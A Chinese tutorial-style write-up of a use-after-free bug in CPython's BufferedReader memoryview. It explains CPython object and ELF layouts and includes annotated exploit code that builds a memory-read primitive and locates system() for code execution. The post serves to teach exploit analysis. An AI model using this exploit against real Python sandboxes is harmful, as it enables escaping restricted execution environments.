一个潜藏10年的Python UAF漏洞

一个潜藏10年的Python UAF漏洞
2022-6-6 23:18:31 Author: xz.aliyun.com(查看原文) 阅读量:42 收藏

原文：Exploiting a Use-After-Free for code execution in every version of Python 3

5月16日腾讯玄武实验室公众号推送了这篇文章，个人学习下来觉得要理解这个漏洞还需要一些知识基础，因此加了一些基础知识的说明，写了本篇保姆级漏洞说明。

先说一下漏洞危害，虽然该漏洞可以导致命令执行，但需要一个前提，那就是能执行Python代码，所以本漏洞几乎毫无意义，作者也说了，不如直接利用os.system，可能在一些受限的沙箱环境才需要利用该漏洞；但是通过其他方式去执行system('/bin/bash')是一件很有趣的事，所以有兴趣的来看下吧。

该漏洞针对的是CPython（C语言编写的Python.exe），需要了解Python对象在C语言中的表示形式，并了解一个特殊的对象memoryview，而作者编写Exp是针对Linux的Python3(64位)，所以还需要了解ELF文件结构。

导读

1~3：基础知识，会的可直接跳过。

4：原文的内容的解释，漏洞说明以及EXP解释。

5：另一个漏洞利用思路。

1.1 PyObject

Python中所有对象都是PyObject的子类，在C中没有类，因此都是结构体，结构体的头部都是PyObject，_PyObject_HEAD_EXTRA在release版本中是不存在的。

另外对于变长的对象，另外定义了一个结构体PyVarObject，多了一个字段ob_size，用于表示该对象包含类型的个数，但是每个类型所占长度则需要看ob_type指向的类对象了。

//3.10.4
//Include\object.h

/* PyObject_HEAD defines the initial segment of every PyObject. */
#define PyObject_HEAD                   PyObject ob_base;

#define PyObject_VAR_HEAD      PyVarObject ob_base;

#define PyObject_HEAD_INIT(type)        \
    { _PyObject_EXTRA_INIT              \
    1, type },

#define PyVarObject_HEAD_INIT(type, size)       \
    { PyObject_HEAD_INIT(type) size },

typedef struct _object {
    _PyObject_HEAD_EXTRA//该值release没有
    Py_ssize_t ob_refcnt;
    PyTypeObject *ob_type;
} PyObject;

typedef struct {
    PyObject ob_base;
    Py_ssize_t ob_size; /* Number of items in variable part */
} PyVarObject;

1.2 PyTypeObject

Python中类也是一个对象，在C语言中就是以PyTypeObject表示，所以每个Python对象通过type获取的都是一个PyTypeObject结构体数据。

tp_basicsize：表示对象基础数据的长度，可以理解为对象头信息的长度。

tp_itemsize：表示每个item的长度，而item的个数则在PyVarObject的ob_size，因为只有PyVarObject是变长的。

PyTypeObject结构体中还包含了一些函数指针，比如获取和设置对象的属性，其实就是对应PyTypeObject结构体中的tp_getattr与tp_setattr指向的函数。

//3.10.4

//Include\object.h
typedef struct _typeobject PyTypeObject;


//Include\cpython\object.h
struct _typeobject {
    PyObject_VAR_HEAD
    const char *tp_name; /* For printing, in format "<module>.<name>" */
    Py_ssize_t tp_basicsize, tp_itemsize; /* For allocation */

    /* Methods to implement standard operations */

    destructor tp_dealloc;
    Py_ssize_t tp_vectorcall_offset;
    getattrfunc tp_getattr;
    setattrfunc tp_setattr;
    PyAsyncMethods *tp_as_async; /* formerly known as tp_compare (Python 2)
                                    or tp_reserved (Python 3) */
    reprfunc tp_repr;

    /* Method suites for standard classes */

    PyNumberMethods *tp_as_number;
    PySequenceMethods *tp_as_sequence;
    PyMappingMethods *tp_as_mapping;

    /* More standard operations (here for binary compatibility) */

    hashfunc tp_hash;
    ternaryfunc tp_call;
    reprfunc tp_str;
    getattrofunc tp_getattro;
    setattrofunc tp_setattro;

    /* Functions to access object as input/output buffer */
    PyBufferProcs *tp_as_buffer;

    /* Flags to define presence of optional/expanded features */
    unsigned long tp_flags;

    const char *tp_doc; /* Documentation string */

    /* Assigned meaning in release 2.0 */
    /* call function for all accessible objects */
    traverseproc tp_traverse;

    /* delete references to contained objects */
    inquiry tp_clear;

    /* Assigned meaning in release 2.1 */
    /* rich comparisons */
    richcmpfunc tp_richcompare;

    /* weak reference enabler */
    Py_ssize_t tp_weaklistoffset;

    /* Iterators */
    getiterfunc tp_iter;
    iternextfunc tp_iternext;

    /* Attribute descriptor and subclassing stuff */
    struct PyMethodDef *tp_methods;
    struct PyMemberDef *tp_members;
    struct PyGetSetDef *tp_getset;
    // Strong reference on a heap type, borrowed reference on a static type
    struct _typeobject *tp_base;
    PyObject *tp_dict;
    descrgetfunc tp_descr_get;
    descrsetfunc tp_descr_set;
    Py_ssize_t tp_dictoffset;
    initproc tp_init;
    allocfunc tp_alloc;
    newfunc tp_new;
    freefunc tp_free; /* Low-level free-memory routine */
    inquiry tp_is_gc; /* For PyObject_IS_GC */
    PyObject *tp_bases;
    PyObject *tp_mro; /* method resolution order */
    PyObject *tp_cache;
    PyObject *tp_subclasses;
    PyObject *tp_weaklist;
    destructor tp_del;

    /* Type attribute cache version tag. Added in version 2.6 */
    unsigned int tp_version_tag;

    destructor tp_finalize;
    vectorcallfunc tp_vectorcall;
};

1.3 bytearray

bytearray虽然是变长，但是数据通过字符串指针指向堆内存，实际数据存储在了ob_bytes中。

//3.10.4
//Include\cpython\bytearrayobject.h
typedef struct {
    PyObject_VAR_HEAD
    Py_ssize_t ob_alloc;   /* How many bytes allocated in ob_bytes */
    char *ob_bytes;        /* Physical backing buffer */
    char *ob_start;        /* Logical start inside ob_bytes */
    Py_ssize_t ob_exports; /* How many buffer exports */
} PyByteArrayObject;

1.4 bytes

bytes对象数据都是存储在PyBytesObject结构体中的，不像PyByteArrayObject结构体是通过指针指向的具体数据。

根据1.1可知PyVarObject中存在ob_size表示包含类型个数，这里就是包含的字节数了，数据均是存储在ob_sval中，并最后多一个字节，数据为\x00。

//3.10.4
//Include\cpython\bytesobject.h
typedef struct {
    PyObject_VAR_HEAD
    Py_hash_t ob_shash;
    char ob_sval[1];

    /* Invariants:
     *     ob_sval contains space for 'ob_size+1' elements.
     *     ob_sval[ob_size] == 0.
     *     ob_shash is the hash of the byte string or -1 if not computed yet.
     */
} PyBytesObject;

1.5 list

ob_item是指针的指针，也就可以理解为指针数组，每一项都是一个PyObject *。

//3.10.4
//Include\cpython\listobject.h
typedef struct {
    PyObject_VAR_HEAD
    /* Vector of pointers to list elements.  list[0] is ob_item[0], etc. */
    PyObject **ob_item;

    /* ob_item contains space for 'allocated' elements.  The number
     * currently in use is ob_size.
     * Invariants:
     *     0 <= ob_size <= allocated
     *     len(list) == ob_size
     *     ob_item == NULL implies ob_size == allocated == 0
     * list.sort() temporarily sets allocated to -1 to detect mutations.
     *
     * Items must normally not be NULL, except during construction when
     * the list is not yet visible outside the function that builds it.
     */
    Py_ssize_t allocated;
} PyListObject;

2.1 memoryview

Python的内建类memoryview

可以理解为指针，官方的说明，正常使用只能指向bytes或者bytearray对象的数据，是无法指向list对象的。

class memoryview(object)
#Create a memoryview that references object. object must support the buffer protocol. Built-in objects that support the buffer protocol include bytes and bytearray.

指向bytearray，就相当于PyByteArrayObject->ob_bytes；

指向bytes，就相当于PyBytesObject->ob_sval；

并且记录了具体长度，无法越界。

# A memoryview over bytes exposes the payload (ob_sval) and knows its length.
v = memoryview(b'abcd')
len(v)  # 4
v[0]    # 97, i.e. 0x61 == ord('a'); indexing yields an int
# Same content through a bytearray: the view now covers ob_bytes.
v = memoryview(bytearray(b'abcd'))
len(v)  # 4
v[0]    # 97 (0x61)

2.2 id

Python中的id函数返回的值其实是该对象在内存中的首地址。

官方文档：https://docs.python.org/3/library/functions.html#id

CPython implementation detail: This is the address of the object in memory.

这里推荐一本书《程序员的自我修养》，ELF文件解析主要的是参考该书以及elf.h文件。

因为Exp是针对的64位，所以介绍的结构体都是64位的。

3.1 文件头

结构体

//include\linux\elf.h
typedef struct elf64_hdr {
  unsigned char e_ident[16];        /* ELF "magic number" */
  Elf64_Half e_type;
  Elf64_Half e_machine;
  Elf64_Word e_version;
  Elf64_Addr e_entry;       /* Entry point virtual address */
  Elf64_Off e_phoff;        /* Program header table file offset */
  Elf64_Off e_shoff;        /* Section header table file offset */
  Elf64_Word e_flags;
  Elf64_Half e_ehsize;
  Elf64_Half e_phentsize;
  Elf64_Half e_phnum;
  Elf64_Half e_shentsize;
  Elf64_Half e_shnum;
  Elf64_Half e_shstrndx;
} Elf64_Ehdr;

e_ident中可以判断出是32位还是64位程序，数据存储是大端还是小端。

Elf64_Ehdr[0:4] = "\x7fELF"
Elf64_Ehdr[4]：1表示32位，2表示64位
Elf64_Ehdr[5]：1表示小端，2表示大端

e_type可以判断是否开启PIE。

Elf64_Ehdr[0x10:0x12]：2表示可执行文件，未开启PIE；3表示开启了PIE

获取Program Header Table的信息

Elf64_Ehdr[0x20:0x28]：e_phoff，获取到偏移
Elf64_Ehdr[0x36:0x38]：e_phentsize，Program Header每一项的大小
Elf64_Ehdr[0x38:0x3A]：e_phnum，Program Header中包含的总数

获取Section Header Table的信息

Elf64_Ehdr[0x28:0x30]：e_shoff，获取到偏移
Elf64_Ehdr[0x3A:0x3C]：e_shentsize，Section Header每一项的大小
Elf64_Ehdr[0x3C:0x3E]：e_shnum，Section Header中包含的总数

3.2 Program Header Table

主要是用于说明ELF文件如何映射到内存中的，可以通过命令readelf -l查看；Program Header Table中的每一项称为Segment，Segment是多个Section的合集，相同属性的Section放于一个Segment，结构体如下：

//include\linux\elf.h
typedef struct elf64_phdr {
  Elf64_Word p_type;
  Elf64_Word p_flags;
  Elf64_Off p_offset;       /* Segment file offset */
  Elf64_Addr p_vaddr;       /* Segment virtual address */
  Elf64_Addr p_paddr;       /* Segment physical address */
  Elf64_Xword p_filesz;     /* Segment size in file */
  Elf64_Xword p_memsz;      /* Segment size in memory */
  Elf64_Xword p_align;      /* Segment alignment, file & memory */
} Elf64_Phdr;

Elf64_Phdr[0:4]：p_type

占4字节，不同类型的值参考于010editor的Templates，会加载到内存的仅LOAD类型，PT_DYNAMIC会指出.dynamic在内存中的地址。

PT_NULL     =0,
PT_LOAD     =1,
PT_DYNAMIC  =2,
PT_INTERP   =3,
PT_NOTE     =4,
PT_SHLIB    =5,
PT_PHDR     =6,
PT_LOOS     =0x60000000,
PT_HIOS     =0x6fffffff,
PT_LOPROC   =0x70000000,
PT_HIPROC   =0x7fffffff

Elf64_Phdr[0x10:0x18]：p_vaddr

占8字节，该Segment的virtual address，虚拟地址，即内存地址，若开启PIE，则是相对基址的偏移。

Elf64_Phdr[0x30:0x38]：p_align

占8字节，Segment的对齐属性，用于表示在内存中的对齐单位，一般是0x1000。

3.3 .dynamic

保存了动态链接器所需要的基本信息。

typedef struct {
  Elf64_Sxword d_tag;       /* entry tag value */
  union {
    Elf64_Xword d_val;
    Elf64_Addr d_ptr;
  } d_un;
} Elf64_Dyn;

d_tag：表明该项值的类型。

/* This is the info that is needed to parse the dynamic section of the file */
#define DT_NULL     0
#define DT_NEEDED   1
#define DT_PLTRELSZ 2
#define DT_PLTGOT   3
#define DT_HASH     4
#define DT_STRTAB   5
#define DT_SYMTAB   6
#define DT_RELA     7
#define DT_RELASZ   8
#define DT_RELAENT  9
#define DT_STRSZ    10
#define DT_SYMENT   11
#define DT_INIT     12
#define DT_FINI     13
#define DT_SONAME   14
#define DT_RPATH    15
#define DT_SYMBOLIC 16
#define DT_REL          17
#define DT_RELSZ    18
#define DT_RELENT   19
#define DT_PLTREL   20
#define DT_DEBUG    21
#define DT_TEXTREL  22
#define DT_JMPREL   23
#define DT_LOPROC   0x70000000
#define DT_HIPROC   0x7fffffff
#define DT_MIPS_RLD_VERSION 0x70000001
#define DT_MIPS_TIME_STAMP  0x70000002
#define DT_MIPS_ICHECKSUM   0x70000003
#define DT_MIPS_IVERSION    0x70000004
#define DT_MIPS_FLAGS       0x70000005
  #define RHF_NONE        0
  #define RHF_HARDWAY         1
  #define RHF_NOTPOT          2
#define DT_MIPS_BASE_ADDRESS    0x70000006
#define DT_MIPS_CONFLICT    0x70000008
#define DT_MIPS_LIBLIST     0x70000009
#define DT_MIPS_LOCAL_GOTNO 0x7000000a
#define DT_MIPS_CONFLICTNO  0x7000000b
#define DT_MIPS_LIBLISTNO   0x70000010
#define DT_MIPS_SYMTABNO    0x70000011
#define DT_MIPS_UNREFEXTNO  0x70000012
#define DT_MIPS_GOTSYM      0x70000013
#define DT_MIPS_HIPAGENO    0x70000014
#define DT_MIPS_RLD_MAP     0x70000016

//other
#define DT_INIT_ARRAY       0x19
#define DT_INIT_ARRAYSZ     0x1b
#define DT_FINI_ARRAY       0x1a
#define DT_FINI_ARRAYSZ     0x1c

部分类型的解释，参考《程序员的自我修养》

d_tag类型	d_un的含义
DT_NEEDED	依赖的共享对象文件，d_ptr表示所依赖共享对象文件名在引用的字符串表中的偏移，引用的字符串表在段表中的索引根据Section的sh_link来确定
DT_SYMTAB	动态链接符号表在内存中的地址，d_ptr表示.dynsym的地址
DT_STRTAB	动态链接字符串表在内存中的地址，d_ptr表示.dynstr的地址
DT_STRSZ	动态链接字符串表的大小，d_val表示大小
DT_HASH	动态链接hash表地址，d_ptr表示.hash的地址
DT_SONAME	本共享对象的"SO-NAME"，因此仅.so文件存在
DT_RPATH	动态链接共享对象搜索路径
DT_INIT	初始化代码地址，.init的地址
DT_FINI	结束代码的地址，.fini的地址
DT_REL	动态链接重定位表的地址，如.rel
DT_RELA	动态链接重定位表的地址，如.rela.dyn
DT_RELENT	动态重定位表(.rel)中每一项的大小（字节数）
DT_RELAENT	动态重定位表(.rela)中每一项的大小（字节数）
DT_INIT_ARRAY	.init_array的地址
DT_INIT_ARRAYSZ	.init_array的长度
DT_FINI_ARRAY	.fini_array的地址
DT_FINI_ARRAYSZ	.fini_array的长度
DT_PLTGOT	.got.plt的地址
DT_JMPREL	.rela.plt的地址，PLT相关的重定位表地址

3.4 重定位表

重定位表是有两种，在看段表时，是会看到.rel和.rela开头的重定位表，分别对应的结构体稍有不同。（PS:段表是Section Header Table，但由于不加载到内存中，所以就未作详细说明）

typedef struct elf64_rel {
  Elf64_Addr r_offset;  /* Location at which to apply the action */
  Elf64_Xword r_info;   /* index and type of relocation */
} Elf64_Rel;

typedef struct elf64_rela {
  Elf64_Addr r_offset;  /* Location at which to apply the action */
  Elf64_Xword r_info;   /* index and type of relocation */
  Elf64_Sxword r_addend;    /* Constant addend used to compute value */
} Elf64_Rela;

r_offset：占8字节，重定位的地址。

r_info：占8字节，低4字节用于表示重定位类型（下文称r_info_type），高4字节用于表示对应的值（下文称r_info_value，即符号在符号表中的索引）。

Exp中关注的重定位表是.rela.plt(.dynamic中的DT_JMPREL所指)，该表中r_info_type的类型都是R_X86_64_JUMP_SLOT，对应的值为7，而r_info_value表示的是重定位的符号在符号表中的索引，.rela.plt相关的符号表是.dynsym(.dynamic中的DT_SYMTAB所指)。

3.5 符号表

符号表每一项代表一个符号，符号表的第一项（索引为0）一般为无效项。结构体如下：

typedef struct elf64_sym {
  Elf64_Word st_name;       /* Symbol name, index in string tbl */
  unsigned char st_info;    /* Type and binding attributes */
  unsigned char st_other;   /* No defined meaning, 0 */
  Elf64_Half st_shndx;      /* Associated section index */
  Elf64_Addr st_value;      /* Value of the symbol */
  Elf64_Xword st_size;      /* Associated symbol size */
} Elf64_Sym;

Elf64_Sym[0:4]：st_name

占4字节，表示符号名称字符串在字符串表的偏移量，但具体是哪个字符串表则需要看自身所在段表的段描述项的sh_link（表示引用的字符串段表描述项在段表中的索引）。

Exp关注的符号表是.dynsym，它所关联的字符串表是.dynstr(.dynamic中的DT_STRTAB所指)。

4.1 起因

原文作者是关注到了一个issue：memoryview to freed memory can cause segfault。

看一下POC

import io

class File(io.RawIOBase):
    """Raw stream that hands the buffer it is asked to fill to module scope."""

    def readable(self):
        """Always report the stream as readable."""
        return True

    def readinto(self, buf):
        """Publish ``buf`` as the module-level ``view``; write nothing into it.

        Returns None.
        """
        global view
        view = buf
        return None

# Proof of concept: keep a memoryview of BufferedReader's internal buffer,
# free the reader, then let a new list reuse that memory. The statement order
# matters because the list must be allocated right after the buffer is freed.
f = io.BufferedReader(File())
f.read(1)                       # get view of buffer used by BufferedReader
del f                           # deallocate buffer
# Reinterpret the view as pointer-sized items ('P') so that len(view) counts
# pointers and each view[i] reads/writes one pointer slot.
view = view.cast('P')
L = [None] * len(view)          # create list whose array has same size
                                # (this will probably coincide with view)
view[0] = 0                     # overwrite first item with NULL
print(L[0])                     # segfault: dereferencing NULL

4.1.1 获取memoryview

POC中的全局变量view的类型是memoryview，至于原因我勉强根据官方文档与源码注释找了一下，且就一看，这一段我并不保证完全正确。

执行f.read(1)，会调用到自定义类的readinto方法，并传入memoryview类型的buf参数。

首先根据官方文档https://docs.python.org/3/library/io.html#io.BufferedReader，知道BufferedReader继承于BufferedIOBase。

调用链：

BufferedIOBase的read方法：_io__Buffered_read_impl，内部会调用_bufferedreader_read_generic
_bufferedreader_read_generic内部会调用_bufferedreader_raw_read
_bufferedreader_raw_read内部会使用PyMemoryView_FromBuffer创建memoryview对象，然后通过PyObject_CallMethodOneArg(self->raw, _PyIO_str_readinto, memobj)去调用子类的readinto方法。

源代码版本3.10.4，仅保留了调用链部分代码，完整代码可根据第一行注释的路径去查看源码。

//Modules\_io\bufferedio.c

/*[clinic input]
_io._Buffered.read
    size as n: Py_ssize_t(accept={int, NoneType}) = -1
    /
[clinic start generated code]*/
static PyObject *
_io__Buffered_read_impl(buffered *self, Py_ssize_t n)
/*[clinic end generated code: output=f41c78bb15b9bbe9 input=7df81e82e08a68a2]*/
{
    ......
        res = _bufferedreader_read_generic(self, n);
    ......
}


/* Generic read function: read from the stream until enough bytes are read,
 * or until an EOF occurs or until read() would block.
 */
static PyObject *
_bufferedreader_read_generic(buffered *self, Py_ssize_t n)
{
   ......
        r = _bufferedreader_raw_read(self, out + written, r);
    ......
}



static Py_ssize_t
_bufferedreader_raw_read(buffered *self, char *start, Py_ssize_t len)
{
    ......
    memobj = PyMemoryView_FromBuffer(&buf);
    if (memobj == NULL)
        return -1;
    /* NOTE: PyErr_SetFromErrno() calls PyErr_CheckSignals() when EINTR
       occurs so we needn't do it ourselves.
       We then retry reading, ignoring the signal if no handler has
       raised (see issue #10956).
    */
    do {
        res = PyObject_CallMethodOneArg(self->raw, _PyIO_str_readinto, memobj);
    } while (res == NULL && _PyIO_trap_eintr());
    ......
}

4.1.2 释放对象

del f将会释放对象，BufferedReader内部的缓冲区也随之被释放，而view仍然指向这块已释放的内存；正常情况下，通过Python代码创建一个memoryview对象去指向一个bytes类对象，之后再del被指向的对象，并不会释放内存，因为引用计数未清零。

4.1.3 重新申请同样大小的内存

view = view.cast('P')：将view内中的数据理解为指针，因为需要根据view的长度来申请新的内存，根据1.5 list的分析，ob_item指向的是指针数组，POC就是想让这段内存正好等于view指向的，所以先将view的数据类型转化为指针，再根据view的长度创建list对象，也就是L = [None] * len(view)。

此时view存储的就是PyObject*，都是指向的None对象，然后通过将第一个指针改为0，再获取导致报错。

当然也可以通过id来获取其他对象的地址，其实也是PyObject*，那么赋值给view[0]，即可修改list L的成员了，如：

# id() is the object's address in CPython, so this stores a pointer to the
# str object 'a' in slot 0 of the memory that the list L is expected to reuse.
view[0] = id('a')
print(L[0]) # a

4.2 漏洞利用

4.2.1 内存泄露

利用漏洞可以让memoryview对象view指向一个PyObject*[]，利用id函数指向不同的对象，再利用list对象L[n]来使用对象。

这里就想到了bytearray了，结构体中是存在指针的，只需要将ob_bytes和ob_start的位置处填入想要读取的内存地址，再使得view[0] = id(bytearray对象)，那么L[0]就可以作为ByteArray对象读取字节数据了,比如L[0][0:8]读取对应地址的前8字节。

typedef struct {
    PyObject_VAR_HEAD
    Py_ssize_t ob_alloc;   /* How many bytes allocated in ob_bytes */
    char *ob_bytes;        /* Physical backing buffer */
    char *ob_start;        /* Logical start inside ob_bytes */
    Py_ssize_t ob_exports; /* How many buffer exports */
} PyByteArrayObject;

现在的问题就是如何修改ob_bytes和ob_start了，作者给出的答案是伪造一个PyByteArrayObject，使用的bytes类，因为bytes的数据就是存储在PyBytesObject中，通过id获取PyBytesObject对象的首地址，再加上固定偏移量，即可指向ob_sval，ob_sval的值我们是可以控制的。

typedef struct {
    PyObject_VAR_HEAD
    Py_hash_t ob_shash;
    char ob_sval[1];
} PyBytesObject;

最终效果如下(作者的exp代码)

# Obtain the built-in _io module through the open() builtin's __self__
# attribute, so that no import statement is needed.
io = open.__self__
def uN(b):
    """Decode the byte sequence ``b`` as a little-endian unsigned integer.

    Item 0 is the least significant byte and every item is masked to 8 bits.
    An empty sequence decodes to 0.
    """
    value = 0
    shift = 0
    for byte in b:
        value |= (byte & 0xff) << shift
        shift += 8
    return value

def u64(x):
    """Decode exactly 8 little-endian bytes into an unsigned integer.

    Raises AssertionError when ``x`` does not hold 8 items.
    """
    width = len(x)
    assert width == 8
    return uN(x)

def u32(x):
    """Decode exactly 4 little-endian bytes into an unsigned integer.

    Raises AssertionError when ``x`` does not hold 4 items.
    """
    width = len(x)
    assert width == 4
    return uN(x)

def u16(x):
    """Decode exactly 2 little-endian bytes into an unsigned integer.

    Raises AssertionError when ``x`` does not hold 2 items.
    """
    width = len(x)
    assert width == 2
    return uN(x)

def p64(x):
    """Pack ``x`` as an 8-byte little-endian unsigned integer.

    Returns:
        A bytearray of exactly 8 bytes, least significant byte first.

    Raises:
        OverflowError: if ``x`` is negative or needs more than 64 bits.
            The previous loop silently packed negatives as eight zero bytes
            and returned more than 8 bytes for larger values, which would
            shift every later field when the result is joined into a struct.
    """
    return bytearray(x.to_bytes(8, 'little'))

def flat(*args):
    """Concatenate the given bytes-like chunks, in order, into one bytes object."""
    separator = b''
    return separator.join(args)

class File(io._RawIOBase):
    """Raw stream that hands the buffer it is asked to fill to module scope."""

    def readable(self):
        """Always report the stream as readable."""
        return True

    def readinto(self, buf):
        """Publish ``buf`` as the module-level ``view``; write nothing into it.

        Returns None.
        """
        global view
        view = buf
        return None


class Exploit:
    """Memory-read primitive built on the ``view`` captured by ``File.readinto``.

    Attributes set by ``__init__``:
      freed_buffer -- the captured memoryview, cast to pointer-sized items
      fake_objs    -- list created with as many items as ``freed_buffer``
      no_gc        -- list holding references to the forged byte strings
    """

    def _create_fake_byte_array(self, addr, size):
        """Forge a bytearray image describing ``size`` bytes at ``addr``.

        The image is an ordinary bytes object whose payload follows the
        PyByteArrayObject field order; a pointer to that payload is then
        written into slot 0 of ``freed_buffer``.
        """
        byte_array_obj = flat(
            p64(10),            # refcount
            p64(id(bytearray)), # type obj
            p64(size),          # ob_size
            p64(size),          # ob_alloc
            p64(addr),          # ob_bytes
            p64(addr),          # ob_start
            p64(0x0),           # ob_exports
        )
        self.no_gc.append(byte_array_obj)  # stop gc from freeing after return
        # +32 skips the bytes object's own header so the pointer lands on the
        # payload (presumably ob_refcnt + ob_type + ob_size + ob_shash at
        # 8 bytes each on a 64-bit build -- confirm for other builds).
        self.freed_buffer[0] = id(byte_array_obj) + 32

    def leak(self, addr, length):
        """Return ``length`` bytes read from ``addr`` via the forged bytearray."""
        self._create_fake_byte_array(addr, length)
        # fake_objs[0] is expected to alias freed_buffer[0], so indexing the
        # list yields the forged bytearray and slicing it copies the bytes.
        return self.fake_objs[0][0:length]


    def __init__(self):
        """Capture the dangling view and allocate a list meant to reuse its memory.

        The statement order is significant: the list must be created right
        after the reader is deleted.
        """
        # Trigger bug
        global view
        f = io.BufferedReader(File())
        f.read(1)
        del f
        # Pointer-sized items: each slot of the view is one object pointer.
        view = view.cast('P')

        self.fake_objs = [None] * len(view)
        self.freed_buffer = view
        self.no_gc = []

在Exploit的init函数中获取了memoryview对象，存储为freed_buffer，fake_objs则是申请的list对象，其存储数据内存空间由freed_buffer指向。

4.2.2 寻找system函数地址

先说一下思路，主要是解析ELF文件，根据.dynamic中的信息去读取.got.plt['system']的值，读取内存的方法都是利用的4.2.1内存泄露。

根据PyTypeObject找到一个指向程序内部的指针（原文设想的是函数地址，位于.text段；注意下面exp中leak[24:32]读取的其实是紧跟PyObject_VAR_HEAD之后的tp_name字段，它同样指向程序文件内部），该地址处于某个Segment中，且该Segment的地址必定高于ELF文件头所在的Segment；
根据页对齐原则（一般是0x1000对齐），向低地址遍历，找到ELF文件头魔数\x7fELF,因为加载的时候文件头必定是加载在页的首地址处的，并且此页的首地址是程序的基址；
解析ELF文件头，根据e_type的值判断是否开启PIE。
解析ELF文件头，获取PHT的首地址、PHT的个数、PHT每项的大小，进行遍历，找到p_type的值为PT_DYNAMIC(2)的项，获取到.dynamic的内存地址；如果开启PIE，那么获取到的内存地址需要加上第2步获取到的程序基址；
遍历.dynamic段，获取到重定位表(DT_JMPREL：23)，符号表(DT_SYMTAB：6)，字符串表(DT_STRTAB：5)，这里获取到的地址已经是绝对地址了，即使开启了PIE，也已经重定位好了。
遍历重定位表，根据r_info的高4字节获取在符号表中的索引，因为.dynamic中DT_JMPREL指向的重定位表的类型都是R_X86_64_JUMP_SLOT；再根据符号表中的st_name去读取字符串表，找到名称为"system"的符号，那么此时重定位表项的r_offset的值就是.got.plt['system']的地址。（PS：作者的exp中则是根据重定位表的偏移去读取.got.plt表中的相应偏移。）

说明一下，第6步和作者的exp思路稍有不同，不同点如下：

作者的exp中则是根据重定位表的偏移去读取的.got.plt表中的相应偏移，我这认为重定位表的r_offset值就是了，作者不信任r_offset的原因我并不知道；
作者没有完全信任.got.plt['system']的值，如果存在PLT，则还去寻找了桩代码，但是ELF的延迟绑定，.got.plt['system']一开始存储的就是PLT桩代码，这一点作者不信任.got.plt['system']的原因我也并不知道；

但是我认为我的思路没有什么问题，因此精简了一下作者查找system函数地址的exp

# Step used when scanning backwards for the ELF header (one 0x1000-byte page).
PAGE_SIZE = 4096
# Size in bytes of one Elf64_Sym symbol-table entry (4 + 1 + 1 + 2 + 8 + 8).
SIZEOF_ELF64_SYM = 24

class Exploit:
    """ELF-walking helpers layered on the memory-read primitive ``self.leak``."""

    def find_bin_base(self):
        """Return the address of the ELF header of the running binary.

        Returns None when no ``\\x7fELF`` magic is found within 10000 pages
        below the starting pointer.
        """
        # Bytes 24..32 of a type object are the word right after
        # PyObject_VAR_HEAD, i.e. tp_name in struct _typeobject. For the
        # built-in int type this is expected to point into the Python binary.
        leak = self.leak(id(int), 32)
        cpython_binary_ptr = u64(leak[24:32])
        addr = (cpython_binary_ptr >> 12) << 12  # page align the address
        # Work backwards in pages until we find the start of the binary
        for _ in range(10000):
            if self.leak(addr, 4) == b'\x7fELF':
                return addr
            addr -= PAGE_SIZE
        return None

    def find_system(self):
        """
        Return either the address of the system PLT stub, or the address of
        system itself if the binary is full RELRO.

        Returns None, after printing a diagnostic, when the ELF header, the
        PT_DYNAMIC segment, a required .dynamic entry, or the ``system``
        relocation cannot be found.
        """
        bin_base = self.find_bin_base()
        if bin_base is None:
            print("[!!] Couldn't find ELF header")
            return None
        data = self.leak(bin_base, 0x1000)

        # Parse ELF header
        e_type = u16(data[0x10:0x12])
        is_pie = e_type == 3  # e_type 3 means the binary is position independent
        phoff = u64(data[0x20:0x28])
        phentsize = u16(data[0x36:0x38])
        phnum = u16(data[0x38:0x3a])

        # Find .dynamic section
        dynamic = None
        for i in range(phnum):
            hdr_off = phoff + phentsize*i
            hdr = data[hdr_off:hdr_off + phentsize]
            p_type = u32(hdr[0x0:0x4])
            p_vaddr = u64(hdr[0x10:0x18])
            if p_type == 2:  # PT_DYNAMIC
                dynamic = p_vaddr

        if dynamic is None:
            print("[!!] Couldn't find PT_DYNAMIC section")
            return None

        if is_pie:
            # With PIE, p_vaddr is an offset from the load base.
            dynamic += bin_base

        print('[*] .dynamic:   {}'.format(hex(dynamic)))
        dynamic_data = self.leak(dynamic, 500)

        # Parse the Elf64_Dyn entries (16 bytes each), extracting what we need.
        # Only whole entries inside the leaked buffer are examined.
        symtab = None
        strtab = None
        rela = None
        for off in range(0, len(dynamic_data) - 15, 16):
            d_tag = u64(dynamic_data[off:off + 8])
            d_un = u64(dynamic_data[off + 8:off + 16])
            if d_tag == 0 and d_un == 0:
                break
            elif d_tag == 5:    # DT_STRTAB
                strtab = d_un
            elif d_tag == 6:    # DT_SYMTAB
                symtab = d_un
            elif d_tag == 23:   # DT_JMPREL
                rela = d_un

        if strtab is None or symtab is None or rela is None:
            print("[!!] Missing required info in .dynamic")
            return None

        print('[*] DT_SYMTAB:  {}'.format(hex(symtab)))
        print('[*] DT_STRTAB:  {}'.format(hex(strtab)))
        print('[*] DT_JMPREL:  {}'.format(hex(rela)))

        # Walk the relocation table, for each entry we read the relevant symtab
        # entry and then strtab entry to get the function name.
        rela_entsize = 24  # sizeof(Elf64_Rela): r_offset, r_info, r_addend
        rela_data = self.leak(rela, 0x1000)
        system_got = None
        for i in range(len(rela_data) // rela_entsize):
            off = i * rela_entsize
            r_info = u64(rela_data[off + 8:off + 16])
            symtab_idx = r_info >> 32  # ELF64_R_SYM
            symtab_entry = self.leak(symtab + symtab_idx * SIZEOF_ELF64_SYM,
                                     SIZEOF_ELF64_SYM)
            strtab_off = u32(symtab_entry[0:4])
            # Include the terminating NUL so that longer names starting with
            # "system" do not match.
            name = self.leak(strtab + strtab_off, 7)
            if name == b'system\x00':
                print('[*] Found system at rela index {}'.format(i))
                system_got = u64(rela_data[off:off + 8])  # r_offset
                break

        if system_got is None:
            print("[!!] Couldn't find system in relocation table")
            return None

        func = u64(self.leak(system_got, 8))
        print('[*] system:     {}'.format(hex(func)))
        return func

# Build the read primitive, then resolve the address stored for system().
e = Exploit()
system = e.find_system()

4.2.3 执行函数

当有了system函数的地址后，应该如何控制程序流程呢？答案依然是伪造，这里可以伪造任意类型的对象obj，并且伪造该对象的类型对象typeobj，obj->ob_type = &typeobj，根据1.2 PyTypeObject的描述，类对象中有函数指针，覆盖为system函数地址，比如tp_getattro（下面作者exp的注释中触发的正是tp_getattro），然后执行obj.aaa，就会去执行tp_getattro指向的函数了。

